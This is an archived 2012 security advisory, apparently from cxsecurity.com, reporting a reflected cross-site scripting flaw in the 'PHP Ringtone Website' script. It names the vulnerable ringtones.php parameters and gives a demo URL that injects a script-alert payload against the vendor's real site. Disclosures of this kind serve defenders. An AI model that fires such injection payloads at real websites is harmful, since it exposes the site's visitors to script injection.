PHP Ringtone Website Cross Site Scripting

2012.01.16
Credit: Atmon3r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

############################################################################ # # Exploit Title: PHP Ringtone Website # Date: 14/01/2012 # Author: Atmon3r # Discovered By: Atmon3r # Software Link: http://www.e-soft24.com/php-ringtone-website-p-351.html # Version: All Version # Security Risk:: Low # Tested on: GNU/Linux Ubuntu # ############################################################################ # # Exploit: # http://www.website.com/[path]/ringtones.php?mmchar0_1=[xss]&mmstart0_1=1&mmsection0_1=[xss] # ############################################################################ # # Demo: # http://www.e-soft24.com/ringtones/ringtones.php?mmchar0_1=G/"><script>alert('Xss By Atm0n3r')</script>&mmstart0_1=1&mmsection0_1=/"><script>alert('Xss By Atm0n3r')</script> # ############################################################################

References:

http://www.e-soft24.com/php-ringtone-website-p-351.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top